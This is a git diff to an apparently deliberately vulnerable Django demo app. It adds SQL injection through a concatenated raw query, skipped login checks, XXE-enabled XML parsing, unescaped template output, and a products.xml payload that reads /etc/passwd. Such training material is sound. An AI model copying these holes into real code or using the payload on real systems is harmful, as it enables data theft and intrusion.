diff --git a/project1/project1/settings.py b/project1/project1/settings.py
index 3a10ff9..449cc3f 100644
--- a/project1/project1/settings.py
+++ b/project1/project1/settings.py
@@ -53,6 +53,8 @@ MIDDLEWARE = [
 
 ROOT_URLCONF = 'project1.urls'
 
+STATICFILES_DIRS = ["static"]
+
 TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
 TEMPLATES = [
     {
diff --git a/project1/project1/urls.py b/project1/project1/urls.py
index 53af268..31f7e8e 100644
--- a/project1/project1/urls.py
+++ b/project1/project1/urls.py
@@ -14,18 +14,17 @@ Including another URLconf
     2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))
 """
 from django.contrib import admin, auth
-from django.urls import path, include
+from django.urls import path,re_path,include
 from . import views
 
 urlpatterns = [
     path('admin/', admin.site.urls),
-    path('', views.home),
-
-	path('find_product', views.find_product),
+    
 	path('login', views.login),
 	path('do_login', views.do_login),
 	path('logout', views.logout),
+	path('', views.home),
+		
     path('add_product', views.add_product),
 	path('import_products', views.import_products)
-    
 ]
diff --git a/project1/project1/views.py b/project1/project1/views.py
index 8a6d6ce..081c11d 100644
--- a/project1/project1/views.py
+++ b/project1/project1/views.py
@@ -4,10 +4,29 @@ from project1.models import Product
 from django.contrib import auth
 from django.contrib.auth.decorators import login_required
 from django import forms
+from xml.dom import pulldom
+from xml.dom.pulldom import parse
+from xml.sax import make_parser
+from xml.sax.handler import feature_external_ges, feature_external_pes
+
+# https://docs.python.org/3/library/xml.dom.pulldom.html#module-xml.dom.pulldom
+
+def home(request):
+    filter = request.GET.get('filter', '')
+    if filter == '':
+      return all_products(request)
+    else:
+      return filtered_products(request)
 
 @login_required(login_url='/login')
-def home(request):
-    return render(request, "index.html")
+def all_products(request):
+    products = Product.objects.all()
+    return render(request, "index.html", {"products": products})
+
+def filtered_products(request):
+    filter = request.GET.get('filter', '')
+    products = Product.objects.raw("SELECT * FROM project1_Product where name like '%" + filter + "%'")
+    return render(request, "index.html", {"products": products})
 
 def login(request):
 	return render(request, 'login.html')
@@ -31,23 +50,27 @@ def add_product(request):
     name = request.POST.get('name', '')
     product = Product.objects.create(name=name)
     print('Added product ' + product.name)
-    return HttpResponse(content='Saved product ' + product.name)
-
-def find_product(request):
-    search = request.GET.get('name', '')
-    print('Searching for ' + search)
-    products = Product.objects.raw(
-        "SELECT * FROM project1_Product where name like '%" + search + "%'")
-    return HttpResponse("<br/>".join(map(lambda p: p.name, products)))
+    return HttpResponseRedirect('/')
 
 @login_required(login_url='/login')
 def import_products(request):
 	form = UploadFileForm(request.POST, request.FILES)
 	if form.is_valid():
 		file = request.FILES['file']
+		parser = make_parser()
+		parser.setFeature(feature_external_ges, True)
+		doc = parse(file, parser=parser)
+		for event, node in doc:
+			if event == pulldom.START_ELEMENT and node.tagName == 'product':
+				doc.expandNode(node)
+				name = node.firstChild.wholeText
+				product = Product.objects.create(name=name)
+				print("Added product ", name)
+				
 		return HttpResponseRedirect('/')
 	else:
 		return HttpResponse(content="Upload failed.")
 
 class UploadFileForm(forms.Form):
-    file = forms.FileField()
\ No newline at end of file
+    file = forms.FileField()
+
diff --git a/project1/static/products.xml b/project1/static/products.xml
new file mode 100644
index 0000000..a114986
--- /dev/null
+++ b/project1/static/products.xml
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<products>
+	<product>Coffee</product>
+	<product>Tea</product>
+	<product>Chocholate</product>
+	<product>&xxe;</product>
+</products>
diff --git a/project1/templates/index.html b/project1/templates/index.html
index 8099814..7959b21 100644
--- a/project1/templates/index.html
+++ b/project1/templates/index.html
@@ -2,6 +2,16 @@
 <html>
 
 <body>
+
+    <p>
+        <h2>Products:</h2>
+        <ul>
+            {% autoescape off %} {% for p in products %}
+            <li>{{ p.name}}</li>
+            {% endfor %} {% endautoescape %}
+        </ul>
+    </p>
+
     <p>
         <form method="POST" action="/add_product">
             {% csrf_token %}
@@ -12,9 +22,9 @@
         </form>
     </p>
     <p>
-        <form method="GET" action="/find_product">
+        <form method="GET">
             <label>Find Product by Name</label><br/>
-            <input id="find_product_by_name" name="name" type="text" />
+            <input id="find_product_by_name" name="filter" type="text" />
             <button type="submit ">Search</button>
             <a href="#" onClick="sql_inject_attack()">Sql injection attack (Get all users of system along with their details)</a>
         </form>
@@ -25,6 +35,7 @@
             <label for="file">Import Products (XML):</label><br>
             <input name="file" type="file" />
             <button type="submit ">Submit</button>
+            <span>Use <a href="/static/products.xml" download="wicked-products.xml">this file</a> to use a XXE Entity vulnerability to expose all users on a Unix system</span>
         </form>
     </p>
 
diff --git a/project1/templates/login.html b/project1/templates/login.html
index e065a7e..7f5ee76 100644
--- a/project1/templates/login.html
+++ b/project1/templates/login.html
@@ -8,6 +8,9 @@
 
     <div style="color:red" id=message></div>
 
+    <p>
+        Want to abuse the broken access control vulnerability and view all products without logging in? <a href="/?filter=%">Click here</a>
+    </p>
     <script>
         function xss_inject() {
             var img = "https://www.freepnglogos.com/uploads/hacker-png/hacker-interpol-arrests-suspected-anonymous-hackers-motley-5.png";